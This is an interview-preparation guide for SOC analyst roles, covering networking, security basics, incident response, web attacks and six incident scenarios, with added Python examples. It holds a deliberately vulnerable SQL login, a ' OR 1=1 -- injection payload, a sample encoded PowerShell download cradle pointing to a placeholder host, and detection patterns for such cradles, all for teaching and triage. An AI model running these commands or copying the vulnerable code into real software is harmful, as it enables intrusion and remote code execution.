SOC Analyst interview in English: a candidate on a video call with two interviewers from different countries; SIEM, MITRE ATT&CK and ticket-system icons in the background
TL;DR: before you start

4-stage process: HR phone screen (30 min) · Technical interview (45-60 min) · Hands-on lab (60-120 min) · Behavioral / culture fit (45 min). 2-4 weeks in total.

4 areas of technical questions: Networking · Security fundamentals · IR + MITRE ATT&CK · Tools (SIEM, EDR, Wireshark).

Live lab: Splunk SPL query · Wireshark PCAP · YARA rule · Linux investigation · Windows Event Log analysis.

Salary ranges, Poland 2026: SOC T1 7-12k PLN gross · T2 12-18k · T3 / Threat Hunter 18-30k.

English: B2+ required. 90% of interviews are conducted entirely in English.

The 4 stages of the SOC Analyst recruitment process

The 4 stages of the SOC Analyst interview: a timeline with icons (HR phone call, technical interview, hands-on lab, behavioral culture fit)
1. HR phone screen
30 minutes · in English · with a recruiter

Employer's goal: check motivation, availability, salary expectations and basic level of English.

What will come up: "Tell me about yourself", "Why cybersecurity?", "Why our company?", "What's your salary expectation?", "When can you start?", "Are you considering other offers?".

Key: a short, focused answer. "Tell me about yourself" in 90 seconds: present (current role) → past (3 relevant experiences) → future (why this role). NOT a full autobiography.

Trap: the recruiter is NOT a cyber specialist. Explain things simply, without deep acronyms. But don't be patronizing.

2. Technical interview
45-60 minutes · in English · with a senior analyst / SOC manager

Goal: check your knowledge of cyber fundamentals. Networking + OS + security + IR + tools.

Format: 15-25 questions at a brisk pace. They start easy (CIA Triad) and go deeper (how SIEM correlation works, MITRE ATT&CK).

Key: think OUT LOUD in English. The employer evaluates not only "do you know the answer" but "can you justify it".

Trap: when you get a question you don't know, do NOT guess. Say: "I'm not familiar with that specific term, but my reasoning would be... does that connect to what you're asking?". A manager prefers honesty.

3. Hands-on lab / scenario
60-120 minutes · on your own or on video · in a shared environment

Goal: verify that you can do the work, not just talk about it. A test of practical skills.

Formats: Splunk SPL query / Wireshark PCAP / YARA rule / Linux investigation / Windows Event Log / CTF challenge. Some companies combine this with stage 2.

Key: read the task twice. Write down your steps. Narrate your thinking out loud. Manage your time (15-minute checkpoints).

Trap: trying to be "clever" by copying commands from Stack Overflow without understanding them. At the end the employer asks "why did you use that command?".

4. Behavioral / culture fit
45 minutes · with the manager or the team

Goal: check whether you fit the team. Conflict, learning, ownership, communication.

Format: STAR questions (Situation, Task, Action, Result). "Tell me about a time when...".

Key: prepare 6-8 stories (1 success, 1 failure, 1 conflict, 1 decision under pressure, 1 learning something new, 1 mentoring). For each one, STAR in 90 seconds.

Trap: NOT "me, me, me". TEAM language ("we identified", "together we decided"). Cyber is teamwork.

30+ technical questions with answers

The questions are ordered from basic (T1) to intermediate (T2). Each question is given in its original English form with a model answer (~30-60 seconds). Learn to answer in English: translating during the interview slows you down.

Section 1: Networking & OS Fundamentals (8 questions)

Q1. Explain the OSI model and give an example protocol at each layer.

A: 7 layers, top-down: L7 Application (HTTP, DNS, SMTP), L6 Presentation (TLS, SSL, JPEG), L5 Session (NetBIOS, RPC), L4 Transport (TCP, UDP), L3 Network (IP, ICMP, IPSec), L2 Data Link (Ethernet, ARP, MAC), L1 Physical (cables, hubs, signals). Mnemonic: „All People Seem To Need Data Processing".

Q2. What's the difference between TCP and UDP? When would you use each?

A: TCP — connection-oriented, reliable, three-way handshake, ordered delivery, retransmission. Slower but guaranteed. Used for web (HTTP/HTTPS), email (SMTP, IMAP), file transfer (FTP, SSH). UDP — connectionless, unreliable, no handshake, faster, lower overhead. Used for streaming (video, VoIP), DNS queries, gaming. Trade-off: TCP = correctness, UDP = speed.

Q3. List 10 commonly used ports and their services.

A: 22 SSH, 23 Telnet (legacy), 25 SMTP, 53 DNS, 80 HTTP, 110 POP3, 143 IMAP, 443 HTTPS, 445 SMB, 3389 RDP. Plus, for SOC work: 88 Kerberos, 389/636 LDAP/LDAPS, 1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 8080 HTTP-alt.

Q4. What is a TCP three-way handshake?

A: Process of establishing a TCP connection. Three steps: (1) Client sends SYN with sequence number. (2) Server responds with SYN-ACK, acknowledging client's SYN. (3) Client sends ACK, acknowledging server's SYN. Connection established. SYN flood attack abuses this — attacker sends many SYNs without completing handshake, exhausting server resources.

Q5. Explain DNS and how DNS poisoning works.

A: DNS — Domain Name System, translates domain names (mbank.pl) to IP addresses (185.95.116.1). Hierarchical: root → TLD → authoritative. DNS poisoning — attacker injects fake records into a DNS server's cache. Victims querying „mbank.pl" get attacker's IP, land on fake bank site. Defense: DNSSEC (cryptographically signed responses), DNS over HTTPS / TLS.

Q6. What is a VPN and how does it work?

A: Virtual Private Network — creates an encrypted tunnel between client and VPN gateway. All traffic flows through tunnel. Two main types: site-to-site (between offices), remote access (employee from home). Protocols: IPSec (legacy enterprise), OpenVPN (open source), WireGuard (modern, fast). Use cases: bypass geo-blocking, secure public Wi-Fi, access internal network remotely.

Q7. Difference between a process and a thread in an OS.

A: Process — independent program with its own memory space, file handles, security context. Costly to create. Thread — lightweight unit within a process, shares memory with other threads in same process. Cheaper. SOC relevance: malware often spawns child processes (process tree analysis), or injects threads into legitimate processes (DLL injection, process hollowing).

Q8. What do you look for in the Windows Event Log for login events?

A: Security log, key Event IDs: 4624 successful logon, 4625 failed logon, 4634 logoff, 4648 explicit credentials use, 4672 special privileges assigned (admin login). Logon types: 2 interactive, 3 network, 10 RemoteInteractive (RDP). Multiple 4625 from one source = brute force. 4624 type 10 from unknown IP = suspicious RDP.

Section 2: Security Fundamentals (8 questions)

Q9. Explain the CIA Triad.

A: Three pillars of information security. Confidentiality — only authorized parties access data (encryption, access controls). Integrity — data is accurate and unaltered (hashing, digital signatures). Availability — systems are accessible when needed (backups, redundancy, DDoS protection). Sometimes extended to CIA + Authenticity + Non-repudiation = 5-pillar model.

Q10. What is defense in depth?

A: Layered security — multiple controls so if one fails, another catches the attack. Layers: perimeter (firewall, IDS), network (segmentation, NAC), endpoint (EDR, AV, hardening), application (WAF, secure coding), data (encryption, DLP), identity (MFA, RBAC), physical (locks, badges). Origin: military strategy. No single point of failure.

Q11. Difference between authentication and authorization.

A: Authentication (AuthN) — verifying WHO you are (login + password, MFA, biometrics). Authorization (AuthZ) — verifying WHAT you can do (RBAC, ABAC, ACLs). Sequence: first AuthN, then AuthZ. Example: SSO logs you in (AuthN), then RBAC decides which apps you can access (AuthZ). 5 authentication factors: something you know (password), have (token), are (biometrics), do (behavior), where (location).

Q12. Explain MFA and why it matters.

A: Multi-Factor Authentication — requires 2+ different factors (password + SMS code, password + authenticator app, password + hardware token). Blocks 99% of automated attacks (Microsoft Security 2024). NIST recommends app-based or hardware tokens over SMS — SIM swap attacks. Best practice: FIDO2 / WebAuthn (passkeys) — phishing-resistant.

Q13. What is the principle of least privilege? Give an example.

A: Users / processes should have minimum permissions necessary for their role. Example: HR analyst needs read access to employee records, not delete. SQL service account needs access to one database, not the whole server. Reduces blast radius — if account is compromised, attacker has limited reach. Companion principle: need-to-know (information access only when needed).

Q14. What is Zero Trust architecture?

A: Security model: „never trust, always verify". Traditional perimeter security (firewall = trusted inside, untrusted outside) is broken — VPN, BYOD, cloud break perimeter. Zero Trust assumes breach: every request, regardless of origin, must be authenticated, authorized, encrypted. Microsegmentation, MFA, continuous monitoring. NIST SP 800-207 is the canonical reference.

Q15. Symmetric vs asymmetric encryption: when to use each?

A: Symmetric — same key for encrypt/decrypt. Fast. Used for bulk data (AES-256, ChaCha20). Challenge: key distribution. Asymmetric — public/private key pair. Slow but solves key exchange. Used for key exchange (RSA, ECDSA), digital signatures, certificates. Real systems combine: TLS uses asymmetric for handshake (exchange symmetric session key), then symmetric for data.

Q16. What is hashing? Why do we use salt with passwords?

A: Hashing — one-way transformation: input → fixed-length digest. Same input always gives same hash. Algorithms: SHA-256, SHA-3, BLAKE2. NOT MD5 / SHA-1 (broken). Salt — random value added to password before hashing. Reason: defeats rainbow tables (precomputed hash → password lookups) and identical passwords get different hashes. Modern best practice: bcrypt, Argon2, scrypt — designed to be slow, resistant to GPU brute force.
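The salt argument from this answer, as an added example in Python's standard library (not code from the original article): an unsalted SHA-256 digest of a common password falls to a tiny constructed "rainbow table" lookup, while a per-user random salt plus a deliberately slow derivation gives two users with the same password different stored records and costs an attacker one full derivation per guess. PBKDF2-HMAC-SHA256 stands in here for bcrypt/Argon2/scrypt, which the answer recommends but which are not in the stdlib; the function names and the `pbkdf2_sha256$iterations$salt$digest` record format are this example's own.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed "rainbow table": precomputed SHA-256 digests of a few common passwords.
# A real one holds billions of entries, but the lookup works exactly the same way.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]
RAINBOW_TABLE = {hashlib.sha256(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}


def unsalted_sha256(password: str) -> str:
    """How NOT to store passwords: a bare fast hash, identical for identical inputs."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_with_rainbow_table(digest: str) -> Optional[str]:
    """An unsalted digest of a common password is one dictionary lookup away."""
    return RAINBOW_TABLE.get(digest)


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Salted, slow-on-purpose hash (PBKDF2-HMAC-SHA256).

    Returns a self-describing record 'pbkdf2_sha256$iterations$salt_hex$digest_hex'
    so the verifier can recover the salt and cost factor without a side table.
    """
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def same_password_different_hashes(password: str) -> bool:
    """Two users with the same password must not end up with the same stored record."""
    return hash_password(password) != hash_password(password)
```

The record format is the important design choice: storing the salt and the iteration count next to the digest lets you raise the cost factor later and re-hash users on their next login, which is how a real password store ages gracefully.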

Section 3: Incident Response & MITRE ATT&CK (8 questions)

Q17. Explain the 4 phases of NIST Incident Response.

A: NIST SP 800-61. Phase 1: Preparation — policies, tools, training, runbooks BEFORE incident. Phase 2: Detection & Analysis — identify the incident, scope it, determine severity. Phase 3: Containment, Eradication & Recovery — isolate affected systems, remove threat, restore operations. Phase 4: Post-Incident Activity — lessons learned, runbook updates, retrospective. SANS PICERL is similar with 6 phases.

Q18. What is MITRE ATT&CK and what tactics do you know?

A: Framework cataloging adversary tactics, techniques, procedures (TTPs). 14 tactics in order: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact. Each tactic has techniques with IDs (T1059 = Command and Scripting Interpreter). Used for: threat hunting, detection coverage mapping, threat intel reporting.

Q19. Difference between IOC and IOA?

A: IOC (Indicator of Compromise) — artifact AFTER attack: file hash, malicious IP, registry key, domain. Reactive — find what happened. IOA (Indicator of Attack) — behavioral pattern DURING attack, tool-independent: PowerShell spawned by Word, lateral movement to DC, unusual privilege escalation. Proactive — catch the attack in progress. CrowdStrike popularized this distinction post-2014.

Q20. What is the Cyber Kill Chain?

A: Lockheed Martin model (2011), 7 phases: Reconnaissance → Weaponization → Delivery → Exploitation → Installation → Command and Control → Actions on Objectives. Defense principle: breaking the chain at ANY phase stops the attack. Hence defense in depth — multiple layers ensure at least one detection. Modern equivalent: MITRE ATT&CK (more granular).

Q21. What is the Pyramid of Pain?

A: David Bianco model (2013). Levels by „pain" caused to attacker when defender uses them, bottom-up: Hash values (trivial), IP addresses (easy), Domain names (simple), Network/Host artifacts (annoying), Tools (challenging), TTPs (TOUGH!). Strategic implication: blocking hashes is short-term; detecting TTPs forces attacker to fundamentally redesign operations.

Q22. What does a SIEM do?

A: Security Information and Event Management — aggregates logs from multiple sources (endpoints, servers, network devices, cloud), correlates events using rules, generates alerts. Components: data ingestion (parsers, connectors), normalization, correlation engine, dashboards, alerting, search/query language. Leaders 2026: Splunk Enterprise Security, Microsoft Sentinel, IBM QRadar, Elastic Security, Sumo Logic.

Q23. What is threat hunting?

A: Proactive search for threats SIEM hasn't detected yet. Assumption: if you wait for an alert, you're already behind. Hypothesis-driven: based on threat intel, MITRE ATT&CK technique, or industry report („APT29 used T1059.001 PowerShell — let's check our environment"). Tools: SIEM queries (Splunk SPL, KQL), EDR telemetry, custom scripts. Output: new detection rules, IOC list, possibly an incident.

Q24. What are MTTR and MTTD?

A: SOC KPIs. MTTD (Mean Time To Detect) — average time from attack to detection. Global average 2024: 194 days (IBM). Top SOCs: under 24 hours. MTTR (Mean Time To Respond) — from detection to containment. Average 64 days. Top SOCs: 1-7 days. Lower MTTD + MTTR = lower per-breach cost. Difference of 200 days in MTTD = $1.6M difference in average breach cost.

Section 4: Web & Application Security (6 questions)

Q25. What is SQL injection? Give an example.

A: Injection of malicious SQL through user input. Classic: in login form, user enters ' OR 1=1 -- as username. Backend query becomes SELECT * FROM users WHERE username=' ' OR 1=1 -- ' AND password=... — always true, login succeeds without password. Defense: parameterized queries / prepared statements, input validation, ORM, WAF.
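The login example from this answer, run against an in-memory SQLite table as an added worked example (not the article's code): the concatenated query accepts `' OR 1=1 --` as the username with any password, because the quote and the comment marker become SQL grammar, while the parameterized version treats the same input as a plain string to compare against the column. Passwords are stored in plaintext here only to keep the injection point isolated (Q16 covers how they should be stored); the table and account names are constructed.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "S3cret!"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: user input is pasted straight into the SQL text.

    With username = "' OR 1=1 --" the statement becomes
    SELECT * FROM users WHERE username='' OR 1=1 -- ' AND password='...'
    so the password clause is commented out and the WHERE is always true.
    """
    sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: placeholders keep input as data; the driver never lets it touch the grammar."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None
```

The parameterized function is also the one a WAF or a SOC detection should be backing up, not replacing: the query string a SOC analyst sees in web logs is the same either way, so the fix has to live in the application.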

Q26. Explain XSS and the 3 types.

A: Cross-Site Scripting — injecting JavaScript executed in victim's browser. Stored XSS — payload saved in database (e.g., comment), executes for every visitor. Most dangerous. Reflected XSS — payload in URL parameter, executes when victim clicks link. DOM-based XSS — entirely client-side, payload manipulates DOM via JavaScript. Goal: steal cookies/session, keylogger, redirect. Defense: output encoding, Content Security Policy (CSP), HttpOnly cookies.

Q27. What is CSRF?

A: Cross-Site Request Forgery — forces authenticated user to perform unwanted action on a target site. Attacker creates malicious link/form on his site. When victim (logged in to target) clicks, request goes from victim's browser, with victim's cookies, to target — looks legitimate. Example: hidden form on attacker.com that POSTs to bank.com/transfer. Defense: anti-CSRF tokens, SameSite cookies, double-submit pattern.

Q28. List the OWASP Top 10:2021.

A: A01 Broken Access Control · A02 Cryptographic Failures · A03 Injection · A04 Insecure Design · A05 Security Misconfiguration · A06 Vulnerable and Outdated Components · A07 Identification & Authentication Failures · A08 Software & Data Integrity Failures · A09 Security Logging & Monitoring Failures · A10 Server-Side Request Forgery (SSRF). New 2025 edition expected.

Q29. What is CVSS and how do you interpret the score?

A: Common Vulnerability Scoring System. Score 0-10. None 0.0 · Low 0.1-3.9 · Medium 4.0-6.9 · High 7.0-8.9 · Critical 9.0-10.0. Score is composed of base metrics (Attack Vector, Complexity, Privileges, User Interaction, Scope, CIA impact) + temporal + environmental. Latest version CVSS v4.0 (2023). Patching priority: Critical < 24h, High < 7 days, Medium < 30 days. But don't rely on CVSS alone — pair with EPSS (exploitability prediction).

Q30. What is a WAF and how does it differ from a firewall?

A: Web Application Firewall — operates at L7 (HTTP), inspects HTTP/HTTPS traffic for malicious payloads (SQLi, XSS, RCE patterns). Traditional firewall — operates at L3/L4 (IP, port), blocks based on connections, doesn't understand HTTP. WAF protects WEB apps; firewall protects PERIMETER. Best practice: layered (firewall + WAF + IDS/IPS). Leaders: Cloudflare, AWS WAF, Akamai, F5.

6 scenarios with model answers

Scenarios test whether you can think step by step, not just recite theory. Key: start with containment, collect evidence, escalate at the right moment. Narrate out loud.

SCENARIO 1
User clicked a phishing link 30 minutes ago

Question: A user reports they clicked a phishing link 30 minutes ago. What are your first 15 minutes?

Model answer:

  1. Contain immediately: disconnect machine from network (do not power off, preserves volatile evidence).
  2. Gather initial info: when clicked, what URL, did anything download, did user enter credentials.
  3. Reset credentials if user entered them. Force MFA re-enrollment.
  4. Check EDR for suspicious processes, network connections, file writes in last hour.
  5. Pull email headers: analyze sender, SPF/DKIM/DMARC, full URL.
  6. Sandbox the URL via VirusTotal / urlscan.io / ANY.RUN.
  7. Block URL/sender at email gateway and DNS.
  8. Hunt for similar emails across organization (Sender Q5).
  9. Escalate to T2 if signs of credential theft or malware.
  10. Document in ticket system.

SCENARIO 2
EDR alerts on suspicious PowerShell on production server

Question: Your EDR alerts on suspicious PowerShell execution on a production server. Walk me through your investigation.

Model answer:

  1. Don't isolate yet: production server, business impact. Validate the alert first.
  2. Check parent process: was PowerShell spawned by Word/Excel (highly suspicious), or by SCCM/IT tool (likely legitimate)?
  3. Inspect command line: does it contain encoded base64, IEX, DownloadString, hidden window flags?
  4. Check user context: was it run as a service account or a user not normally logged on this server?
  5. Network connections: did PowerShell open outbound to external IP / unusual port?
  6. File activity: did it write/execute new files?
  7. Map to MITRE ATT&CK: likely T1059.001 (PowerShell), T1027 (obfuscation).
  8. If malicious confirmed: isolate, kill process, escalate to T2/T3. If false positive (e.g., admin's legitimate maintenance script), document and tune the rule.
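Steps 2, 3, 4 and 8 of this answer as an added Python triage sketch (not the article's code, and not any EDR product's API): it scores a process-creation event on its parent, on the command-line indicators the scenario names, and on whether the user is in a per-host baseline, then maps the score to the step-8 decision. Because `-EncodedCommand` carries base64 of a UTF-16LE script, the payload is decoded first so that IEX or DownloadString hidden inside it are matched as well. The weights, the `OFFICE_PARENTS` / `MANAGEMENT_PARENTS` sets, the `BASELINE_USERS` table and the two EDR events are constructed assumptions to tune per environment.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Parents that make a PowerShell launch highly suspicious vs. ones that make it routine (assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
MANAGEMENT_PARENTS = {"ccmexec.exe"}  # SCCM client; add your own IT tooling here
# Assumption: accounts normally seen running things on each server, derived from past logs.
BASELINE_USERS: Dict[str, Set[str]] = {"srv-app01": {"svc_sccm", "dbadmin"}}

# -e / -enc / -EncodedCommand followed by a long base64 blob
ENCODED_COMMAND = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)
# (pattern, weight, label) for the command-line indicators named in step 3
INDICATORS = [
    (ENCODED_COMMAND, 3, "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "IEX"),
    (re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I), 3, "download cradle"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-nop(rofile)?\b", re.I), 1, "no profile"),
]


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded_command: str = ""
    action: str = ""


def decode_encoded_command(command_line: str) -> str:
    """Decode the base64 UTF-16LE payload of -EncodedCommand, or return '' if there is none."""
    m = ENCODED_COMMAND.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(ev: ProcessEvent) -> Verdict:
    v = Verdict()
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    # Step 2: parent process
    if parent in OFFICE_PARENTS:
        v.score += 4
        v.reasons.append(f"spawned by Office application {parent}")
    elif parent in MANAGEMENT_PARENTS:
        v.score -= 2
        v.reasons.append(f"spawned by management tool {parent} (likely legitimate)")
    # Step 3: command line, with the decoded payload appended so hidden indicators count too
    v.decoded_command = decode_encoded_command(ev.command_line)
    text = f"{ev.command_line} {v.decoded_command}"
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):
            v.score += weight
            v.reasons.append(label)
    # Step 4: user context against the per-host baseline
    if ev.user.lower() not in BASELINE_USERS.get(ev.host.lower(), set()):
        v.score += 2
        v.reasons.append(f"user {ev.user} not in baseline for {ev.host}")
    # Step 8: decision
    if v.score >= 6:
        v.action = "escalate"      # isolate, kill process, hand to T2/T3
    elif v.score >= 3:
        v.action = "investigate"   # steps 5-6: network connections, file writes
    else:
        v.action = "benign"        # document; tune the rule if it keeps firing
    return v


def sample_events() -> List[ProcessEvent]:
    """Constructed EDR events (not real telemetry): one Office-spawned encoded launch, one SCCM script."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    encoded = base64.b64encode(script.encode("utf-16-le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        ProcessEvent("srv-app01", "jkowalski", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                     ps, f"powershell.exe -nop -w hidden -enc {encoded}"),
        ProcessEvent("srv-app01", "svc_sccm", r"C:\Windows\CCM\CcmExec.exe",
                     ps, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ]
```

The `reasons` list is what you read out in the interview: each entry is one of the scenario's steps with the evidence that satisfied it, which is exactly the "why did you decide that" the interviewer wants to hear.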

SCENARIO 3
Ransomware on 1 endpoint: what now?

Question: An endpoint shows files renamed with a .locked extension and a ransom note. What's your immediate action?

Model answer:

  1. Isolate the endpoint immediately: disconnect from network, disable Wi-Fi. Don't power off (preserve memory for forensics).
  2. Identify the ransomware family: match ransom note + file extension on NoMoreRansom.org. A public decryptor may exist.
  3. Check lateral movement: query EDR for the same hash on other endpoints, query SIEM for the same C2 IP / domain.
  4. Check identity: what account was used? Are admin credentials compromised?
  5. Notify the IR team / legal / compliance immediately: RODO (GDPR) requires 72h notification if data was breached.
  6. Don't pay yet: escalate to leadership.
  7. Preserve evidence: memory dump, ransom note, encrypted samples for analysis.
  8. Recovery: restore from offline backup (3-2-1 rule), rebuild OS from scratch. Never trust the original disk.

SCENARIO 4
1000 failed logins in 5 minutes from one IP

Question: SIEM shows 1000 failed login attempts from one external IP in 5 minutes targeting our admin portal. Your action?

Model answer:

  1. Identify attack type: high volume, single IP, single target = brute force. If volume was lower across many usernames = password spray. If multiple usernames + same passwords = credential stuffing.
  2. Check success: was ANY login successful? Search for 4624 (Windows) or success events from same IP.
  3. Block the IP at WAF/firewall: fast win.
  4. Threat intel lookup: is the IP on AbuseIPDB, Talos, AlienVault OTX?
  5. Check for distributed brute force: same usernames from many IPs (botnet attempt).
  6. Tighten controls: enforce account lockout after N attempts, require MFA, enable rate limiting.
  7. Hunt: is the same threat actor targeting us elsewhere? Cross-reference with other recent events.
  8. Document and report.
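Steps 1, 2 and 5 of this scenario, together with the Event ID and logon-type reading from Q8, as one added Python example (not the article's code) run over constructed Windows Security events rather than a real log. It separates brute force (one account, high volume) from a password spray (many accounts, few attempts each), checks whether any 4624 followed the failures from the same source, flags a 4624 with logon type 10 from a source outside an assumed jump-host allow-list, and looks for the same account attacked from many IPs. Thresholds, addresses and the `KNOWN_ADMIN_SOURCES` set are assumptions. Credential stuffing is not distinguished here: it relies on breached username/password pairs, and the password itself is not in a failed-logon event.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

FAILED_LOGON = 4625
SUCCESS_LOGON = 4624
RDP_LOGON_TYPE = 10
# Assumption: sources allowed to open RDP sessions to servers (e.g. a jump host).
KNOWN_ADMIN_SOURCES: Set[str] = {"10.0.0.50"}


def event(ts: datetime, event_id: int, user: str, ip: str, logon_type: int) -> dict:
    """A Windows Security event reduced to the fields a SIEM exposes (constructed, not a real log)."""
    return {"TimeCreated": ts, "EventID": event_id, "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type}


def make_sample_events() -> List[dict]:
    """Constructed sample: a brute force followed by an RDP success, a password spray, normal logons."""
    t0 = datetime(2026, 1, 10, 22, 0, 0)
    events = []
    # 120 failures against one account from one external IP within 4 minutes (brute force) ...
    for i in range(120):
        events.append(event(t0 + timedelta(seconds=2 * i), FAILED_LOGON, "admin", "198.51.100.7", 3))
    # ... then one successful RDP logon (type 10) from that same IP
    events.append(event(t0 + timedelta(seconds=250), SUCCESS_LOGON, "admin", "198.51.100.7", RDP_LOGON_TYPE))
    # One failure each against 40 different users from another IP (password spray)
    for i in range(40):
        events.append(event(t0 + timedelta(seconds=6 * i), FAILED_LOGON, f"user{i:02d}", "203.0.113.5", 3))
    # Benign: an interactive console logon, and RDP from the sanctioned jump host
    events.append(event(t0, SUCCESS_LOGON, "jsmith", "10.0.0.21", 2))
    events.append(event(t0, SUCCESS_LOGON, "admin", "10.0.0.50", RDP_LOGON_TYPE))
    return events


def analyze(events: List[dict], brute_force_threshold: int = 100,
            spray_user_threshold: int = 20, distributed_ip_threshold: int = 5) -> List[dict]:
    per_ip = defaultdict(lambda: {"failures": 0, "users": set(), "successes": [], "first": None, "last": None})
    ips_per_user: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        st = per_ip[e["IpAddress"]]
        if e["EventID"] == FAILED_LOGON:
            st["failures"] += 1
            st["users"].add(e["TargetUserName"])
            ips_per_user[e["TargetUserName"]].add(e["IpAddress"])
            st["first"] = e["TimeCreated"] if st["first"] is None else min(st["first"], e["TimeCreated"])
            st["last"] = e["TimeCreated"] if st["last"] is None else max(st["last"], e["TimeCreated"])
        elif e["EventID"] == SUCCESS_LOGON:
            st["successes"].append(e)

    findings: List[dict] = []
    for ip, st in per_ip.items():
        # Step 1: attack type from volume and username spread
        if st["failures"] >= brute_force_threshold and len(st["users"]) == 1:
            findings.append({"ip": ip, "type": "brute force", "failures": st["failures"],
                             "window_s": (st["last"] - st["first"]).total_seconds()})
        elif len(st["users"]) >= spray_user_threshold:
            findings.append({"ip": ip, "type": "password spray", "users": len(st["users"])})
        # Step 2: did ANY logon from a source that was failing succeed?
        if st["failures"] and st["successes"]:
            findings.append({"ip": ip, "type": "success after failures",
                             "users": sorted({s["TargetUserName"] for s in st["successes"]})})
        # Q8: 4624 with logon type 10 from a source that is not expected to RDP in
        for s in st["successes"]:
            if s["LogonType"] == RDP_LOGON_TYPE and ip not in KNOWN_ADMIN_SOURCES:
                findings.append({"ip": ip, "type": "suspicious RDP logon", "user": s["TargetUserName"]})
    # Step 5: the same account attacked from many sources (distributed brute force)
    for user, ips in ips_per_user.items():
        if len(ips) >= distributed_ip_threshold:
            findings.append({"user": user, "type": "distributed brute force", "sources": len(ips)})
    return findings


def finding_types(findings: List[dict]) -> Dict[str, Set[str]]:
    """Map each finding type to the set of IPs (or users, for distributed attacks) it was raised for."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        out[f["type"]].add(f.get("ip") or f.get("user"))
    return dict(out)
```

The SPL in Lab 1 below does the first grouping step of this logic inside the SIEM; the point of doing it in code here is to see why the "single IP, single user" and "single IP, many users" splits give you different step-1 labels and different step-6 controls (lockout helps against a brute force, MFA and rate limiting against a spray).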

SCENARIO 5
DDoS attack on the company website

Question: The website is unresponsive. Monitoring shows 10x normal traffic. Help.

Model answer:

  1. Confirm DDoS: check traffic patterns (volumetric like UDP flood, protocol like SYN flood, application like HTTP flood?). Check with NetFlow / monitoring tool.
  2. Engage DDoS protection: Cloudflare, Akamai, AWS Shield. Switch DNS to scrubbing center if not already.
  3. Identify attack vector: SYN flood (block at firewall with rate limit), DNS amplification (drop at edge), HTTP flood (WAF rules to block bot signatures).
  4. Block attacking IPs / ASNs at edge. Watch for spoofed source IPs (likely amplification).
  5. Coordinate with ISP if attack exceeds capacity.
  6. Communicate: alert IT operations, status page update, exec briefing.
  7. Post-incident: was it cover for another attack? Check logs for stealth lateral movement during DDoS distraction.

SCENARIO 6
Insider threat suspected: how to investigate

Question: HR notified you that a sales rep is leaving for a competitor and may have downloaded client data. What's your investigation plan?

Model answer:

  1. Engage legal/HR/CISO FIRST: insider investigations have legal implications (RODO (GDPR), employee rights). Don't act unilaterally.
  2. Preserve evidence: pull endpoint logs, DLP logs, email logs for the last 30-90 days. Snapshot the user's workstation if possible.
  3. Check DLP alerts: any data exfiltration triggers? Volume of files copied to USB/cloud/email?
  4. Cloud activity: Salesforce / CRM downloads, OneDrive / Google Drive sync to a personal account.
  5. Email forwarding rules: suspicious users forward to personal accounts.
  6. Print logs: large print jobs in the last weeks?
  7. Document timeline: chronological reconstruction of suspicious activity.
  8. Coordinate with HR on offboarding: disable access at termination time, recover devices, exit interview by HR. Chain of custody throughout.

SOC interview training in English with VOCAbite

CYBERSPEAK for CompTIA covers the full range of SOC vocabulary needed for the interview: 1200+ terms (alert triage, scenarios, MITRE ATT&CK, IR), native audio from real SOC dialogues, behavioral STAR practice in English, listening tests at interview pace. A Polish junior with B1+ English becomes linguistically ready for a SOC interview in 8-12 weeks.

8 behavioral questions (STAR method)

